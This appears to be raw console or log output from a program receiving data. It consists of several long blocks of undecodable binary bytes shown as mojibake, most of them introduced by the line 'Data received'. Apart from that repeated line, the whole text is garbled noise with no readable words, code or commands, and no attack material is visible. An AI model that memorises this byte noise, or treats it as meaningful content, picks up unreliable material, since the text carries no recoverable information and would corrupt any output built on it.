‰[Kø§jÊ=Vów¢ã)ŸÃäÁCžÈ·ß n2²r$hûÓÀJîyb¬‡„$¦¦|Ê~ŽX“¾×Ú h¢-¢+JLOsǨAyALv2[F· #Bk©«Ò¾ôâÃV÷g΋϶â%µóûQ*<ˆU£¥×çΟ’tÍêAı£¬ ¢iî’ä]äT¢ìˆ°X¶^£RQچ–˜BÕX¨:“¾bç.^ê±+—?¥KæG2wß\°*,vŸoóPÕb2"ÜêÜT,´Üµð©€“„MÈՆšU]ýüi»[3{9×£*F±ڇ´@œøñ ȹe ëtCqÀ2æÌð„J­×vž”Û.Òû-V½ Üæ 52C¾SÉ¢É}aSzvQ 4´ %ò°4šx¯p–Ì«”làÈWôBÄ8ºÛ¼íŠÔŽŸ…g!á£ø“êáÉ·ÜYÜÛrq—†ÏÒìí=–¬Ç)ØmáU
Data received „'¨†o‚†>fùG4öhךe3ݸbÌ­áÀ²h‚N=¢à$´Gw Ø'â×>~÷™Ó\?Xúۜ'¹6Ó 4~ړ ğÏÉx¿™´£…æÊ)âC¨„èÈiถ½1{Ð1îäõL”±å´uoA÷,‚J BÐ ƒhÉ5tºÝÔèO®ûó8¾\ǯÀNiuËÀý¿Ê²Ÿ*,AØ^éH6.NÑbòJà1ðL!…8}ƒ,šÄ§“ôA×R9ÐÒ© ¿b[µåTjjdÛ]D³;ª- ´]’öÜÿâ冯ïhtòDïtVmro7ªzŸ·Wjµ›¥Ö#°e&2ø± œù}u"øjw¤ÉæªV(U¡QÕmE¾o`P£j­ý|6I…±žÙ¸Jøi\-ÊíÄÀÅèˆ,dD è£FMœVÑéXŸ_s<V››I‰Œ.µ#ÄY—ô˜Fâü½ÓÁµËēf[¥dcÛZn¢‹öiÑ6 ìOÝU¿ƒV@~)îa¶ Ÿ™Èãèm‰ØÁ?¯Ívœß’Imä}%k U !§Tš]yµ2ÿ‡}óeSiª´œÔ).XºÀ·YÌAÀžùDˆÜ… <Õa><̓іq×ÈÓEXo(8+ssxgHèú'â%ƒ0wéH´k8Ȅa\Lt{"ƽXzŝð­.EV䎄JÄK¾ÿ«]aÛÆ«ÍAÕõ¼´Ç7áõcl‡$ž}ÿ»T>þïõ2H*Þ©­~è`šîDQ—õÝ"O!UÙA–É&³Š.­Ž‹µ:½P"Ÿ«¿)tˆƒMv‰¨¦yßz9{ç+/.Ã‰Y5}³䶘©TRà¿Úµ›aHÌ`‰SŒ«y= ÂÆK…Ëþ§DM;æa6,{f·”‡4ý.BFß f¨R›¼O¤Ýõ)FØùBDêvNÑHZ–»pK)1×…-Zôa.b”*ëΒѹéÉ±Ç–€µB`Û"Òo&ÛFYýÖ¢€Ž²íüJ.ã½¾×X$á®66¼Î[5ð-/2;–G ñ—6ˆ””]‹>Øfy9͂vÒÓÍp±óÄ@³»ÿõ` îÙkÔq™ª±°„Ìå h¦åÀæòuÀk…‹”•|ÍdúiY`Ą‡š1Ô½QÁE hm£öoÊo"s®„ôë Ù[»²@ílãâ¹"Ë֏˜1ðí·¾lÛ¯mê'ØÙ!+=¬€™xãcJ"þùñW[Ø7œèRȐT’áÄÚA¤‹³éx#é=än=×`(Ñ]ÓáÅ6¸) îEòçO¯êuNRMŽºàükqÀ™ò¬B ¯¡ÿjIR¨‹ôp%¢Ñ|.™VJåý·:““Àí/3²ðNÁQÙmHz…0¶31©{O×òjäMΚBEkU¹#[_²ã—›Vë'¤fQ' ÃÐU?7ÆêŸ÷–UÖ¡å:Ð^Éêfi3=] ަĨørå{Š¿Ð– Æÿ}]ÛêåO«x>‘ K·‘í¹:;È&ä–Od#]ܓ g›ÚÉìك“Å*–êæ8\YjMàUՔ0ßu%d^ºÐ ¯­ I¾ˆKr_ã7Àúq‡CD´£ ‡0"%¯øú¦áªJ(΃̠û‰…†W=|¡»¤ 1Ï1V2ªàÿܹ üàLòº›+€Õ Tž¬âTl“ªÑ·(ymr1^f­¬ˆD&†Ï7<.$EÙã…›¤»<Í0«ý¡•t& Y =<GÍÄBu%ûUî‚íFóÝç#AÙÆ¢Ì3û
Data received ü9š—šìf%]hm¯(MŠ!Z 'E/¤K„)V•¿#“FùIÏ@!ñ½·Ø¤å„ªþ˙©ä#Ђ2í8¼ ‹iš`…3qör§Ê '±ŒÐ¤ÕB)½oppã`µ*›&ä¾³-ì‚q =¦I:i›¿ÉJa‡ôFÓv1ü¨oãæêAôÀBHô²sÈD·] ßmJ9Öëÿl¸‰Á7Zl·ªº ²(ù Ë2^„OúW.ÞAݾó{‹¿šÙ;t“[1Ù§Áã`Ž5›”¸þD[#ÇE¥ˆß÷Ýuk+ÐÇ >ßBõËmjÎë<d& –Ýèr€B×橞eþ±Éκ ÚÍ㷆ç¤#†Fhف•sw̚Ó;á"úIý¹UÊ®Óß¡êÁ°ŽF a!ãqSakBšƒ‹k֙Àc¿—œ·„šFº“@ÊS S‹€§ ôýî×ûzþmF“øc–­ã\10ðÞ.2¾ÎPI7›bKò‡‹º%íðWuWúZsBnûeõÖ~ŽBþF‡®7:¹D:ëlÈL+4)9¢xGÃÃcÊÓq[ݝóQ„Î>³ÝÑíMÒøó9v-ióÏh¹RøB~i\t/®:xÄNÇP!–,FKœbZ19XÍ£¦ª!½·qxGGŒI{gèVJ۟½«jÛéóAj‹6ì´kãDÕ$e@÷SÐìåƒT¶ÛTäFÆ±ÏÌv£ô£+!Öñœö¤ö§Yˆ0ÙÀÆ0!>Ö¬Ú÷˘®Æ^  ­—úóÄä“$]<eUX9gö)Zö·ÙEqåF1†RWI Dœ„‹¡@ħE]¿Ïfd_ ^âf‹¨'>Œ0‹¬Švñ–D]qs ¨ñlY+ÔN–é]_Û8ÖÖÔ0ÎЫ€?$i«9à~a ä?§Ü Ý&Ê.O;ÆèWÞs%ø’;a'(.‡Ï#«zQKA=Æ]½NÍ:t̹b÷FÙø¶š®_¤õÔ㎵V*›QԚ™s”`~ûþ–‰é†3.L0>ð›DrÕ6À]EJ'ð0µ¨’Ÿô‰,¡s‰ÔÒ0¦<$~Ç؟³KMѐ«w:½×Á.6%Ó‰‡–ѸÿDF?î´í\AÒB{e7<ëÄd.adÄDaüŠð½"QÐÖ«“Fá þ •üÊó!Ø}È♯ÿ×0ÌXˆùɺžþú ‡a/4Dæïӕ-/–$2\‚ì©k5‹v©ëJCWt¶Ü1†Ã¡¦ BÊ'q½E±¸}ÝrˆCJSúîájXå°ÇŠ BW:ÆF‘M«Ü(v:3|©Š1kÜø‡ ȑ,1ïqÄ¶Ñ ºI’]‚.‹dÿŸ"çoíÍ,ˆŸ\”AÚ½i…+<âc‰²ÖĶ:kC|#Ž<|¢Ò QG§2 Ρĭ¿/ üi°À/ç-_ç±ôr¤D §u¬¹Ã¹¤Ž+þÛ´¿û° xŠCÉ 3ÎÀ— ïWB™»Î\\Uðt[4_?Ôa;T¨zaÞªÃ(Ùlh:là`ïäjÿù†“à‘³½“ŠbIÊôàæAëʶ%{`‰•Šû%H/Wp=tq*Å[Àؤ9§{ÍØo =qÀ½©üœ¹<£NÑô%‰§ÔNÀnMÀÙÓِCâG*çùx²¿R5.˜´5µd·H2ÑÁa~Nî(¶AyæqА×ýtÙ¿ò»‰#­þ-5éï`öÒ s¹Àï 8VNãõ‡Ø3ñ²ë4š¾(·Vc:¨º“M£ܑùµÏ07¾À–"+0ØÕ`uˆŒ݊
Data received .Þz<³)’©ÄÜúz>†ŠæZ)½Œ0ŒêYù#IøeÐKÆÿ 2ÔYkd,‚ówh„&°cí D‹ßð¨nãOËÝ£³àºG˜,-ÄRGNÙ8ö" Dñ¶Œè?ޞÚ:Êò\IÎd¨û“v¹^@éQÍ0áˆ.×ë·(4Ð(¯&ˆ5ÈÊq•æÕ®$³ =q”†ÈÖȆžªÉÃôg‹CG“øå‰|Êþi}ۆøOf w“8<ZbösÿÉ⸫­º[Ý(¡?5ÌÍV(©Ï[´ï#.ܒh¨XŠ‚ççFlˮڳˆ`™¦¿è=E¹Ÿê©|¶& ¸Âø>¦LNoF&L«¤agI©AAoAòÜTèÊ#‰¯úÛkÑøø &ùîq ¥$|þ¬üò ŠåQ}Dwò†F‡,[ »¯â ­W«~#² |º5ႊ^¼§ØC÷®œÁÇ6å)º’lœCԟ-MÂÊË!"`€iur< #X9jMŸÞäž $| XfYÉú¶*o‡j•åÈE<Uó :™í{¸l•Åø¢E.m¹-Ô%¥v\ƒ:RÜl1³õ—Þ"¬%®¼íÀH ˆ8Ú`ƒäUóÖ6VnÁq.+ý&‹-¤8åw½Óò5š.Ä?ضž?wˆŒ ‚ŒíË¿ã&Äßµ¤HŸ£‹ÍB©Á`6›â²%BÈÙjä*’³¤-OŽ4‹¹vÞ¶Æxð”¶fº¥ÆöâX­¦þi¥m‹×—œX0çHŸŒ°W²Öe giTì¨wWœ¶‹Ù+Ô®¨¢gHaŒšÇ |>Nç©Lóô]£‡³8Ý1u$x£Å œ6~JÙ4“ î]n;´DéoÓtzX„äìW)Z~öÁaÖ|lG5e^´ÝúQóL$H/]r[óºÏG9<ÿŸ¨´ªݑj2±OÁ­Å–Oñé4Ì:ݝtÙx<Î]îÐ}ÿ¬bø+¿.¥$—ª¿3åñáW\Ì¿¿9 $|¦ƒÄj¢ùDÐêo¯ö]¢-"œÒ؏¶J©v•€w&ü êtóMF‘Ûš:Í!’ȵ)I¦Ï+a#»é2·êͯêK‡¡øèp×~¨î¤‹Ž½KøòúG·Æ+g2ÆñÊ2M7I…LÇÓñ§vpc-mš9E®œÇÉÑ^ÝÔ –OA f£·WiBx­õšöÓùôŸèœôH»‡IBˆyµÜ×ë0¿»gŸ2]†ëNšÅÃà«âu%šp’©Ö{+’¸Az& .v>òr0ÔÙýP¯‹ ž'…J÷“y³›¬TŸuöjU$ƒ Þ:”r[kà(»æ}Ø«Aù¼=ÂØüV¯ ­Ì)é…TÜ÷Ó ÚwÛB鶿Ji¥ãTlK=ኯ #˜4Òª65£€ÕT£Ò=š}n9®g­Ü;úZ(«¢¥ܱ½¶¸©Ø3Ìr ˜ªÉH٘גòa9SÒÕ^òQ7j#œo”-ÌØÒÉ]RóˆY!)É¢¸«a2ÿû¨fwáOŸèÔ+×NøxòÑ$ülwÌæÇu0 V¼ @ná°ÇR"Íò–=™ƒùøÉU„¡aOSèÊM€_s`}9‹\°¯ûC2YΩ9¥)\»ÄѨjÝØp?ÝjP;¡!¼† }a=àÎ>šÂUK¬-%êNOå5Ór>«Ñ]¯Óýý¬YÔeO…ōwútÍS!+©/ü”a&Ӈ
Data received ʝբûÚmHn{4Ĕ\jôàˆíKB§­õÆv±]uú€€Ï¸snŸ´o9Û6ö¤üAñ·†ÏæîÃO«ã)½ë²vÿŽ«¶fd\ Ûío¤èSõš¯¶öµ†‹¯Ï^qJ= mØKá»ä™Õ} ‘Q'/ŸN[Á2jñ‘`÷ÿƒ™r«—Eܸöêޜ­5øô9­»¹=T=u¨N¢>¢z?Pғ0®•õÈ$R©.0—€ôÇöx1süq¼êðêO;"‘Uš5C¹ê­VɟoӑV VoEƒµè¤áý^i‰Ô+FlqgSvϱˆw«ÚFä×BÇܜɉ 'WÇ2æ{p1*V‘ž¦lŽ³¸è®>B«„`ʦZͱ¥g¿’oNì bݱ“QˆÍz„¸ò¸€l‚ûj³VŸŽÃ«K^,Œ•15˜Ï„Èëõ܃ÃýMñýÙä !ÿ«CáB™Ûeõ¦ýdÎoU=º‹Ón«ûwΛ,B-d¤Ûn‡´84³º«Ëz»ÁjÚ©õ鑸Áì,„ ÎU5‡‘òí`Akdњ½Z~v+<Q÷l’hSêÆÅ ê$qSæÄ+^_jW_ qMŠ¾w.?PZWŸÞ7¸“„jÈuo× €6•ú¡>賂µ¶/@zøÝ­5Hzßµ¡¡|/m¸BÈYu‚„! ˜±°¦zNpÁ÷ÏՍ“Ĺ­ÒÀoi6{„>¾½Øï§)5…rãüKk÷2Do¾i̬2ì§D„ª¿¬ˆW,Ÿq²g%¤‡Æ¡™}ún= T»·6Ê×D  ¼ÙÍgŸË<¥Yµ©0ƒŽU´›÷!½-ÿ>¤T«âdâøÃä&A;e×oœ¯Úõ¢Ãñ W↠܈-øšýUN“TJ¾ò Vì…ü¶j ªÈUÍ|PJö¯\ýõogöWëXîµu¶¡?¾ÖFœqâ+¢Ê“f·’Êzµj†~ôaÚ2]ß ¾䪴^Xz‡O1¾41–Eêoç±ÚÛç™o!u­A±ß¾BÇT2E=ÐAS¸MÕXô_:¯`ç&•–dËMFݹÄ_ßx|P²ÕÃÃøêq¾ÿë1á|AÅ݆]-·U̧ÜV¬R.ì8…¬©'ø)éBÇ'MÇ{๒GPüzfª"P'4Õ OŠïàÍé™QBŠc©3MÑ=9țɰº'BÚeL­ØX½ e}þ¾ñ‰$ê§Ü·Ú/©-“aCŠ*g“(_ýú?peÎâÃ@õÓóÐN­½²Ü\†$"„ùÄoò¤>}ÿؓýƪìâºúV©Ó»£Y­ 9>ø\ Ã§Å©ýCËw&iæb+îú';Âဋ0‘jËrküF$Tª`pþýv»öNèÆO l¯ø Ÿ-¡ó´ÂrÖ)˜jŠ¦Y*ü/ š}ö'NMœ@âôœ~î[`]Õ]Y[1ú†Ô)W®sž’ ¡ùÎ ¢Lü.¢ [B`ð6؟ú2„<Q™ ¶¢J¦Ù# -v•> ¸7ä¬;›3æ§:åvÎϓöDŽ¹åSaiì°<™®“r^ó¶d£=© ¸]ä#‡1|ǝú\FÔkó (YÔì“îK’¯÷ufÝÔVCíx²ímxžp›ö\焸½ßšî²¨Øߤ–…8N€‚UùÅð‡]Œ1@gl ,­Ä§ùüþûâ ¯ÈɒÌKüøÎÁvá4°ŒlˆÄì‡ï9$X\]lœïÞq9Ôñ¤ ¦Ëg¶tw«Ÿ&xMfñ™aÑÚwä—mj zº 3+m¹VÂYüÞC¬Ñ.ofÑj¨°8l–
Data received ×ߤ©¡ô¦y› Òv'qýˆŒASI L)ÅÇ{!T0†5/œ°g¿°‰§§‡]²zôé@7øøÝq%{öÖQ ‘½rÓ1vçÕMç«NQDÒ Ýý2o ?àrh´½òvÖ,>8m0y/q5 ^€–1í-ò,ÏAþo`ž€X;©áChÖ½1À¥•Ø‚J1.²’a—ýƒUZ",0•›nŽÛy>=Ó¾Xgøú-—¨Ìúö@ÁHHœs„­f .oþƒ³–xóµŸVŽ R-VÑtv¢f$ۖ™õ‰wJm}ZÍóŒ¥ êdDBîJ¤5ð±µK eØÜÎSW×ýàpŸ*·­*Ô$£J+¶Y…úK‡{¦"ŒIŸ\ò;_¾£!§ñjBLñübáUþáN1ö«I7J-?òB2òÍ ¥\u ÚÛèŒrž1«1ŌÕ&ëT/† )nžè¬yG ‹rú–²p½| ]dªiÛq`uZµ Qڈ‚3#NÞNoN&`  ܨå[ €buýB¬”¥ÒW}?€”M}Áú%ErI½øS bh‚‘¸‡%>Ç©K\íэ˓yš¤ê«1W­Ñ?j<L—¾m‚Ýt½r‰nSîÜ_pÔªwŊ5M<êÈGh8õí tú¦±*cþŒ§ñCnh Ž²¼2Á|Þ­,bLøïH<G÷‘¹Š7…¦Ö2RéDV) ‰@ªºÂí\¸ŒÃΏq €Lžæ€0‘é Zâ@ÞYƒ'ä÷y:iÔIWÓöœ‰“[Ý& Òµ<¨æ÷L¶—aíâ^ „JYi×î•ÐVÿ}˜Ê䲋id—™¤lÑlùßâÝb# „†73§ˆéϼÝ}ïtÓ¤—£MtQ÷¢"£û;ÁÖ¨¥#[ ªß®ÞÈì½Û.Á7ƒœi8¿©³8¡L^£Ð#g¤ìã67ûÒï9Rj‘v\‚õŸ 0=h1HKÃë4¼jlÜáÇSXDXîÂX|„¯@;҂Ïs®EìùñÝæØÒð…ƒNh‘%x{þ†ƒ–ÿä¦+—P6“,ôqžér´ùR«ž(¿'ùNeÎ%ÆàÞ,÷]fóÏòŲ¹*v©â À/·î#µ6uG±BÓ1 Á¤¶ÿ¥v‰mF jo¢_GS¼Ò‹*‹²48xðƒÞ‰ÂÇ5´qøgO vkºÚaU¸¡7•ցþ^կпֹ¯šÍbDƒßEO\d%qíH¿e¢ùïåL‡?²¯¿qêàhµh+£W–¨'‰8çJ¢1‚€Ÿ|Ðþó/Í\Ý:Ä&KÔ&Õ–†qî4ð8aÚ Ÿ §Ñ¦Èé·ûâ'EaÉ0çñT$ÍL:îÊ+{nýr{0ÕyipV¯¾v!~îŽäy'¼Ý²Ú:eì茲(.iù‰˜R贆·Ï×$šŠ¡Õ´óí¨í˜ú”irþ……†žIç»È¶ù»obvé¿zÏ؀–N©H,µªw¼^÷;á;ôå'ÈDwû/Èí«ìîÒÔïÖƄÆ:Kë»ÑÛ½+¢¢'%Ãë㹜dEܶ¨Û<ùAp6`@WËâãl2ÓÛ](ZñmÈÈ@ywñ‘^J ΞOS´U™U,r**Cˆù†öÕë6敿¶Žå…Ý£Qt^…«ƒ×5Á ?“;HâԊ‰'ôÉ΋¶0S!†b˜{?Ë!@–yšuæҜÆ9yäCPnJ¾ Ržø·JBþ"+HT‰)
Data received ©ÞA¥T¡6+‚Eþðudù¢ Juø/jâÔÍTÖ܈µXËTÈùS%b{SÄÄ¢ ôEï5DvjbÆÃSÁ²7V’¢Xȍ¶¸©t ÙVÿ»ÿl^˜ðpœ]ä 0\&Bб^_GœÖۇ̉#—&͆E仳¥å~´ÐR¯|Fx¡]¸Ø‰±FŠÓ1ï‹ðç¤ÞÞJ¥åé^*ˆ¦ïKå#TÀҁ÷»w²Z€úØoܖƣ9yt0Ë®#ð~žwÝSK¯ üʼR’Çh¥Ä.’8¾/ƒvùGø~k¯÷_?ÛNj.÷‚°¼Fñš ›h¥LCä‰,v­f.݁¦gIÃó}†Vö×w¿_if­•ƒgÅH+¶Â™dÏfSµÝ3㣝[ÉYem*keë=·Š6W<›ÐÅ<ΤVíä‘Â{¢~?pa ’áš”ªÜ|0EÉÜϜC•q¥`Æïúî¡z¶<üÏY¼Cq9ÖT“ú-4ü±[xR£Šâ4šz‹ÚkÔø.k¼óQ0 ðQ¯ö¶÷|é#™b©3äô2¤{±j„§˜µY–4¢ÿ7-^ÕqY€D~OÛ^›YMâæfÏä¸É4’ Ys¼ ÷-2-u/ˆÿ¶a¡'Õ ¡Üàݜ#©)es™äiàß¼[–AšUö%µ32® õ«¡ÆÀ/¨ ›É\MRù78òs„LÙ#ØÒ´‘áù}å×ò”ßoÝù^”|#Xê³=ZG¦²&¼ùt¥ÍÊÔy{qÓp˜ÊÕù=Ãt»â¡É¢Ñ°VtL±k/…¹”Š$ŸÖÉ¥ Àwc¯Ê`¥â>T5yÞÚ?B^µ-é\"¤öVõqžÏŠ¸@:ª ôT,‡ûûExÑ”ÏÐ.€»š´2d¿Ä}Ç«e]MnûÍ3Ì¿àFà·GiL‘¤/ê²ÿe SnȲïeâ½a!î]„úùºY:ÏÖãfñiþÇ!x†Ïƒ6½ðxºŠÁ“ub/šGS\Jy€ )zêIçùQƒuÖ@^kaÒa°{ÍÁ#2wùŸ$UÈ]û“õÕh—æÉh_‘…•È‡ ûª5ë—eÖ)_uX,‘ÎpN°%BÕ»}íÎå|?åbgvÏFÏ­úøxš aè®LÖ Dí.^Y<Û^² s“2OÑd¶ÐU@‹y¿$Õãþ5ó‰}¼ ½˜JôOðÅ B›¾¬ž’1ã`”±œM·_‚åuÛ_N£-!„U:D®3S†‹ÙïŸä0y„«Ö˜cÜn×û&‰¡*Z˜Ø­wMO_á] ¥CÒåc¸éßenê}±ä|C0¾3rÖL'qJ"Ý´6«‘ÆûXæ;(ê£nðôNs›¼ ±ªD>NÉ"ÐZô „ºv{ éG/„ ¼æ ±óæÔ=`NW-D ¡>Eö˜Y½ÃïGzƓВuxo7Öënr¬]q¨“¿Q­|§[“‹œ=öœìy[ąB=,ˆ;»»¸¨L¿+J²‘‹"¡°·Y©0@¾}áô&‡×*@ü FƒÚqG[4ñå\—¡ö)¡’’œcÏﺌu[­–j†_dtÐàôWó ÃøµMƒ¬|uÇí2ü—­šÇÒ¨‚¼_ ¡„V)ë¸<8à|È`{͔Wø6ÔµÁ!‚ìVá„U(?’Ôó µaÖVG>+’Ñ„Ë Ž௲'àŸ÷  J¨Æe}6vu$i&á‚\d_H͵»„N‘j¹âÝ-î±¯2í6„òà
Data received GaQ­ÅM tSØS ô=é+àc~rÊúÈã]ݱ›U†¢BZ.}/òbŽa¯ó~y°…E R´¨|¯ÿ @CÊèOºßÍÉdç·ÉMaÃ`Ý$â§6èuŠs)@Ôm®¹›ß"¤˜·ÚÃp'yñõEž Sž‰h“Ù Ð 4ã¡õ‘ÓI7z(þ~ùºzŽÕM4õOºñh+D—i›ñ_“0E— .ÃANZ2 ©›ïú\»TªPôc•B¥ÎþvҘ$xôzUã° w¨¾˜|‹Âºþ|&òÿ™MÒÛÈ ŒñšÓfYîy[½=±JK„{¶›`= sȄ®÷7uëU,f¥k’9¨ŠëY˜‰ħÑð+^8}Õ× ÁøÛH3ÒF.[ówýM³êÜÝįØ8ρ ü;p™œt(™9w$>gص©i$; Ù²¢:ÖÿÎÁN·)™£ ¾BŽE¸*…dqž#Ï)¬a՞<:šWjÕgð2™f¯·‹C'•è»ˆ!œ@-‰ }÷W‘Œqë@l+ ^KWó&a|jÛ ŒŸÈ—¡’¦Ÿ"3r?íX¨ö.Šö"ݛ=àvÆC˜eûbXzlÜÝåÃIŽ§“½™SÒ=º' ‹çÎpœÖ½âA¯Úq®µVÏυݼ«n·Ó™S¨¥¾æËðUXîD‘)h!Xß^=Áçä«'ã2烄ö­z¸ñA¼7ÈYþ5ï÷eÒaØÌÝF ¢­—£¼5Øü»cŠBí}—[XA÷T5š£]Cå¿ônU¿áՒ ½Ü10Q²f{À`í5¢î|JÜ(¡æ­¦øœhýP ÞW¤0—ÀrÂá4ÏNݔýoÆçÀTCðÓ ¹&ªéçš÷Œö‹‡öX‘œû]•ôyb—ÂAdƒ^»àª«:(;³ŸP®¹‡!™ê'ÄákcX¬io¸€mu)O0—(û6x ¯ùÆBæ.N!b÷É$?…rÉÐa…ʤ©¬g;Å~){œÑq›ñśԈ¡,…•dåMÂ9oïœû)ëì· zñ0Âc”o*QµS ®3¸°ôDe‹-ìëÉÃx½“ãgK³]WÖͶ5£Å\²:¬zßUÕÒCNŒÀ£h“¡à›†„¾(‘mÕ/àyìÍ/¸bÝÊöÒñ9EcaÌ& ß3R%HIÄ؄²×{À–3ìr‚­Y©s͚>O àön‹BáY†g€[xA^]÷…8R©Ï“êB(›§³°81£¥ õ×y!|†­„„‡ üed'EÓ y¶h­Îój½48[s¶6‡ÖÙÛ¢=Q¢¸j¶drRß\»SýO!“Òìû¡€˜ëͯÕËR¦øñj5½×“† bÅyóÐc|RÕs'óm¨Œ\᳓oï9Å4Ó}4‹TŒœ ;ßÐ'¨á|t0¿z¸{>8D³—¦.@%• °­Ãìÿ¶Ã¤Æø’¹Óm² jø.ṋ˯ºÖ ‡AÏlq³¥•A£­Ó¬€ÎÐm£†;âšá5Ò.TØÓÚ¢u\þøVÍ(³ÁŒ‘Déos d¨&¹ëzÉõ¬¾ßZüïÜä:Èøí‡0F‹i:Žˆ2…¦,„ ªVÿ<ýjÄÄÉj= ›F#­ÈXÔ£ËmF£‚õ­‹“¥Õ )JeFe6ÉgnÎ-”+ñhé«ß’€\¬až¦ÔNHvG› ¾ÉɈ—@czbñq—O_0[ãÈI£Ÿî‰ÿ”s ±ìü&Àw¨B‘Beõ0¶Û+–©·Ç
Data received =K܏Á«^]¯BèUâcI72«/lsù•î¡QÂn!ÌZ6ißxðËÝ»8_Hàø#l¡&R&_{«^‚"æ"v(·Q,$6N–¸ÓV9éåV–•3¸€÷ÿ»F±T(wW%eªh/Ó_ÓÌ+¹.O[€v™]úNªý¢p×o¦Cú7Oÿ Èê.TìQ«iou|a¬…,½ÞjêG»Þmæ˜a²l“ 1[…_ ž™%yåËu¹€ wŒ”[ø …¡ƒëˆ¢pn†qA¬É€>„Qg¹i_Ån¸Ê-aÜ¡MûXº‘Œù¤ËLx^"ÜňDç–@¬Ï‚Ð>Õ0 fQYJ+#!¿ï¼ET.2^ª¶îIâÓÈàU³8½Ãx‚iÜr%”ÊK"+/VÏ+;aé‘"ó¢ê¥?¢ÊÞ{Pâ43v†Ó‰z?æþ˜Dµm)q‚ˁ6Ói*£˜,{ƒÆP(Ð+¤|ýØq©û<ˆ»Ã2çyº 5/p¯ýòk'sŽˆOPn€6¹ÐÞ2C®5–¯U¾ç,›ôt{ùA)l±ˆbŸ¬7+ÔÐ0He‰‘ŠQMO×Òõɜ+‚ÜØ×áҊímšùž4´Ë¯ó©çÖ¢¯T Z{\4÷•®lzMóûOûã,ºD•â~%wVZ¥Ç6üå`P÷¦èn¡ÉÊÊ 2öú˜ìàÅ;r~žWZŽ€=â]zNÚŦö XAŽdå¬y-j#3Ue|ß÷ö7µ[/›„ 2ó9me¸€ Ðe4 JâÁž¶â‡AJs¸¨ZËéïM%LE[صȳ'ŒÕ^ûE\&ö4ʈ¦ý™¨³_ø$#dÛ "ˆæÉbەàH½<†õ˜½î‚M`\y9TC!­Ž ‡oO‹©CUrÇÿ PZçëò€ZÛér{ÛÈ..l(§î=×Û´{O¿Zh¨€ ì¶0¿Âª nâVóŽœÿW+¨À9`ñ¦©ãòjµDw>pûr¾CkÏ `à"zJ†¨å6ÖȐ‡&†ò9WÔls4|%L8¬¸u@IÜ¢{šÎJÀÙÏáô ’³$´L$—«í •2 ‚b`öTi¨¦áŒŒ¢m“X¬J„—?š0Ž² ó ÞF¿Y¬öŸ ºT¶0S­Ê°ÃlÒÌkô2jàŠ` ÿ^>ïz5VyÔ ±ë Ôm­<}ˆ‚]ó`ͺr‹ˆ:b›Aö)\çãþ›dS @ä= ×ß®S<›N×õ<Õ0'àE%—Hã€ïªŠ'´_&dx p±ç›ç¾S{ÔÅÞD"î}‹°)úS‹^ëOv8Á¶„þ”Ò× ›˟ /·Åmb¾¯fgû¥Ôü.—¥¬ jæÚ2R¶$2›n˜ úW®MXGѾªRss€˜|]ªQ¤d;­E^eçA Ûß{‰N/öP4ŸÝÒÔ­oÌi1óäêýû¶MÔ.§ñn‰ÍŠÀ7Ä$‹Y X¶~wûÒð}düï,];» iŒiE 8Ѓ¼VáwéòȐëOM,Ó½i›}´nŽé¶¬ArЫa9ûðüMM¨ fIœyå{ÂÖþYÌ=ì ì}Ò­” ƺº=×|x<™59š†¨ëÆ¡Õ¹ºáæ`Çà¦D}€cw&»{ÌÔJÜû0ѳ0¾Õ£§³d=hA ®ÐÓL Û~|_ç¼}‡ä£Qö‰nó ؽÂw@2¸»MÑ Ü´^û«‚FßÕ¦L2½a¦Œã¿.žŒ¬pÒùÏӉi§ÊEݞì
Data received 0(ÐKúÓA苜l“o‹LRúB-K "uʕ<ôíF®:.6 ÁÅ|ìo`§ûTÊ4œè½\>¹ ŽÍËÄ[Í'­Óq"sZTéo™¦Ò´S„ŽpÊ'߉­žú?]8G<Cªóè$¬/øE Ø›Mü•ícOn%Ðü¯‚ñT,bT’;žWF’¦zwý6 D¦ƒº.yÞVÖTÞĄR¡I“¦ocþr½• P½‰¡×˜rf`÷@Óò¥æu}Ôxʝltp?}Ç¿V”˜¬ÜÇ©F€uÒàXƒÉŠ’ˆ‘%QÑU[*ÕúÓyB…ª CRÓ£=…¬é¹N«´Ö©Ð’“GœºÛ‰;JZ²xmµVÐãù™ÿÝV‰CNv”$Ú­\·.å5×}‘Çú"ŠL£f>ö0u}·ˆ ò?•õ‡Î).)Áo½‡œa¼yvU„Dî k£¸ôÂ@|Ñô4àWr[VN FÐr½D@§*5©{S¨‡ÔÍýö{Ní1ob¥ô, –Ù‚§ªaá ’ õ' xZmæׯ¡¦Ï0‚]Ç£PÊbT¦PVXÉÊ)‹¦x@¥@áý”ÚÐgò²b,ތ jëgmΣ=á“s²©†Ù-Lª‹cî;fÈiá\LÙ§Êuçêƒs/\#zç©Ábò]+³:o¼ Û@å:’öÝ#ÑdFÓ¦;"óG=ƑꅓÕîw:cÚÌ6Ïæ½ äbeÅVëý>}lL—ë×£µ27¢…âZþi¥$ƒ4O3xe‚‰Éì”â M祻[ÂvîÅq^~2êÞæÕe]Ÿwµ~Õ`í)yO-ñcçö4Ét&¹üq©‹™?ï2MN÷¿J.„cדCÕ¿í*ÕH¡H”Þ äޝdO¾×6êóNq\*òƒ/ëóÓe`\M*¥L¤Üå*ƒÜqʚå@=¸íŠuù¾êÆ&œæ_WŒ£À Ȋ§¸Z‡üÙ2ÌNH¨6ÕmÑùL3ÃL6Šj$<ý˜˜*%„¤}Ü=Öºp[¼/Sn“½€~’¬ô7œ.Ñ!Ÿ*–q}Ðn¤¸)×%…?WQÞ¶HúÞÁ¶SÒê¿Øò¹Ó®³§?®,|š õµFELFl…ã‚‰€ªÐ…µcӛ\iš³išE§9H½'y‡|–~Î>ÿ­Ó-@ƒèùÁDñD¯"B~‚6u;pZ±„ÕÞxú‡Å¥. fñ¾©·{ÉãJ1ÝEqF >nuÖÇ#ëÀPÍ×Ûý¢0oó8ƒ­V"iB:@„VŒ:²Uü±cbÏ_8÷5D«e‘9ïSùñ=VØß¿9ö}ž­ø`í˜jx*€ŠÈÍÄmL„ð°ñ7;‡Nul¤î/¿ç· Ê 8§4B¬0¥DN²~Æ10gCÎoŠ/HYè &ª_(x¿ÄGqý¿6ރ%¶ \“}ؖ }ÕðÍ Ì\çõ‡+/×â6a?C­K6M®gÓ[yùn¥`å°¬ORÝ"#ït5d„úVdýÀlÃci;Ř“§mÜ 3x<yÜ]‡,W¥C‚„mÚ?)Ò—´‘FgíÇ, íÿ‰YÑp†°øJ’ø•V²#»B{­]ʒ5eŒVWZö6rï«;LUyƒè¡Z Dy °á f2R?$ ªS¸­/¢ù­P8Û²ù™’0 š¹V>w©rÈü—ÓÈö44*‘ %Od_Æäß¿1Öê™íüñ¹™¥ô!GÙoa eí 